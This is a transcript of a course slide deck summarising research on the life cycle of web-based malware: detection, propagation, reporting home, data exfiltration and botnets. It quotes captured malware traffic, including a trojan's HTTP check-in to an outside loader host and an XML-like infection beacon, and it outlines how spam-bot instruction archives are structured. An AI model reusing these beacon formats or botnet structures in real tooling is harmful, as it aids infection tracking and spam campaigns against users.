Introduction

25
CS 510 MALWARE GHOST TURNS ZOMBIE: EXPLORING THE LIFE CYCLE OF WEB-BASED MALWARE MICHALIS POLYCHRONAKIS PANAYIOTIS MAVROMMATIS NIELS PROVOS 1

description

CS 510 mALWARE ghost turns zombie : exploring the life cycle of web-based malware Michalis polychronakis panayiotis mavrommatis niels provos. Introduction. The underground Internet economy Web-based malware The system analyzing the post-infection network behavior of web-based malware - PowerPoint PPT Presentation

Transcript of Introduction

Page 1: Introduction

1

CS 510 MALWARE

GHOST TURNS ZOMBIE: EXPLORING THE LIFE CYCLE

OF WEB-BASED MALWARE

MICHALIS POLYCHRONAKISPANAYIOTIS MAVROMMATIS

NIELS PROVOS

Page 2: Introduction

2

Introduction• The underground Internet economy • Web-based malware• The system analyzing the post-infection network

behavior of web-based malware • How do malware’s behaviors taken together

provide a compelling perspective on the life cycle of web-based malware?

Page 3: Introduction

3

System Architecture The goal of the system

detect harmful URLs on the web

The brief overview of the overall system they used in their prior work machine learning techniques are used to find suspicious URLs

among a large number of web pages for verification in a virtual machine

The new extended system Responders

Page 4: Introduction

System Architecture

4

Over system architecture

oVirtual machine usedoObserved features:

• Links to known malware distribution sites

• Suspicious HTML element• The presence of code obfuscation.

oMachine learning system• Scores if the URL has a high score

oVerification results used to retrain the machine learning system

Page 5: Introduction

5

System Architecture

They extended the system improving verification components with light-weight responders

Providing fabricated responses for protocols such as SMTP, FTP and IRC

HTTP proxy is to record all HTTP requests and scan all HTTP responses

Generic responder is to hand off connections over nonstandard ports and identify connections that use unknown protocols

Responders

Page 6: Introduction

6

Responders Network flow in the verification component

Page 7: Introduction

7

Life cycle of web-based malwareo Malware’s interaction with other hosts and

responders are organized into 3 categories:1.Propagation2.Data exfiltration3.Remote control

o They analyzed the post-infection activityand the result of these behaviors to find out the life cycle of web-based malware

Page 8: Introduction

8

Life cycle of web-based malware Data Set In 2 months virtual machine analyzed URLs from 5,756,000

unique host names and report on unique names At least one harmful URL in 307,000 hostnames %49 of these websites had URLs that resulted in HTTP

request initiated from process other than the web browser %5 of the sites had URLs that activated responder session The total number of responder sessions with transmitted data

is more than 448,000 They observed that malware made network connections

without transmitting data in many more cases

Page 9: Introduction

9

Life cycle of web-based malware Network characteristics

The destination ports of all outgoing connections from the virtual machine upon infection

Page 10: Introduction

10

Life cycle of web-based malware Network characteristics They notified the number of unique hostnames

for each port On these hosts at least one URL installs

malware that transmitted data to that port More than 400 different destination ports were

connectedThis shows the diverse nature of malware’s post-infection network behavior

Page 11: Introduction

11

The exact distribution of HTTP connections destined to nonstandard ports according to the destination port number

Page 12: Introduction

12

Life cycle of web-based malware Discovery and Propagation Malwares usually scan for other vulnerable systems

either in the same lan or on the internet to propagate

This figure shows the network protocol distribution used by malware

Page 13: Introduction

13

Life cycle of web-based malware Reporting Home To observe this activity SMTP responders are

employed to capture emails Each email captured has a subject and body

Page 14: Introduction

14

TABLE 1Subject # MessagesXP Hacked 390ProRat [...] 162Vip Passw0rds 98Log file from ... 82Installation report 76Perfect Keylogger [...] 47Installation on XP succeeded 12E g y S p y KeyLogger [...] 12INFECTADO 6Mais 1: XP 3AVSXP 3C-h-e-c-k-i-n-g:XP 2...:Noticia quentinha de:... XP 2

Table 1 shows that the most common email subjects

SMTP Server # Messagesyahoo.com 436google.com 118tvm.com.tr 98aol.com 82hotmail.com 19outblaze.com 8globo.com 6

Life cycle of web-based malware Reporting Home

Table 2 above shows that the common SMTP servers used by malware to send installation reports

Page 15: Introduction

15

Life cycle of web-based malware Reporting Home

GET /geturl.php?version=1.1.2&fid=7493&mac=00-00-00-00-00-00&lversion=&wversion=&day=0&name=dodolook&recent=0 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; ) Host: loader.51edm.net:1207 Cache-Control: no-cache

The HHTP protocol is also used to report successful installations back to malware authors

The trojan example:

Page 16: Introduction

16

Life cycle of web-based malware Reporting Home Malware also reported infections using a

custom XML-like format

HGZ5.<FT>2008-01-28 12:55:30</FT><IM>80</IM><GR>_&</GR><SYS>Windows XP 5.1</SYS> <NE>XP</NE><pid>488</PID><VER>Ver1.22-0624</VER> <BZ></BZ><P>1</P><V>0</V><IP>0.0.0.0</IP>

000......<LC></LC><GR>-</GR><IM>25</IM><NA>XP</NA> <CS>English (United States)</CS><OS>Windows XP</OS> <MEM>1024MB</MEM><CPU>2200 MHz</CPU> <NET>LAN</NET><video>0</video><BZ>-</BZ>

Page 17: Introduction

17

Life cycle of web-based malware Data exfiltration There are indications of data exfiltration in

responder sessions such as browser history files and stored passwords

o In their observation, they found some emails that send back stored password from a compromised machine

o HTTP is also used for sending sensitive information back to data collection servers (notice the large number of POST requests on the graph on slide #11)

Page 18: Introduction

18

Life cycle of web-based malware Data exfiltration In 2 days, one server had 4,729 files including

more than 250,000 valid email addresses They found more sensitive information in

extensive logs continuously uploaded by malwareLogs have victim’s IP address, DNS server, gateway,

MAC address, username, URL, intercepted form and password fields of HTTP request

o In 250MB logs, 500 usernames and passwords were found for over 250 web sites such as banking site, google.com, yahoo.com, etc.

Page 19: Introduction

19

Life cycle of web-based malware Joining Botnets Botnets They encountered 2 types of botnets in their

work:1.IRC Botnets2.HTTP Botnets

Page 20: Introduction

20

Life cycle of web-based malware IRC Botnets IRC and C&C communication IRC sessions to 90 servers were observed using 1587

different nicknames in 95 channels

Page 21: Introduction

21

Life cycle of web-based malware IRC Botnets Some malwares use regular nicknames and

channels, but some of them use artificial nicknames such as

[0]USA|XP[P]152102 or Inject-2l087876

Page 22: Introduction

22

Life cycle of web-based malware HTTP Botnets Organize large-scale spam campaigns To participate in spam campaigns each bot

repeatedly downloaded ZIP-archives with instructions using HTTP requests

Each response has a ZIP-archive with instructions on how to participate in spam campaigns

Page 23: Introduction

23

Life cycle of web-based malware HTTP Botnets Some example instructions: 000_data22 - a list of domains and their authoritative name severs used to

form the sender's email address  001_ncommall - a list of common first names used as part of the sender's

email address  002_otkogo_r - a list of possible ``from'' names related to the subject of the

spam campaign  003_subj_rep - a list of possible email subjects,  004_outlook - the template of the spam email,  config - a configuration file that instructs the bot how to construct emails

from the data files, how many emails to sent in total, and how many connections are allowed at a given time, 

message - the message body of the spam campaign,  mlist - a list of email addresses to which to send the spam, andmxdata - a binary file containing information about the mail-exchange

servers for the email addresses in mlist

Page 24: Introduction

24

Life cycle of web-based malware HTTP Botnets

Top domains out of 700,000 email addresses collected from a spam-sending botnet.Email Domain Frequencyyahoo.com 28899sbcglobal.net 14417yahoo.co.uk 8939shaw.ca 8321hotmail.com 6985korea.com 6041yahoo.co.jp 5215striker.ottawa.on.ca 4415web.de 4276yahoo.co.in 4200

o The most frequent domains captured in an hour didn’t entirely overlap with the larger data set

Page 25: Introduction

25

Summary and Conclusion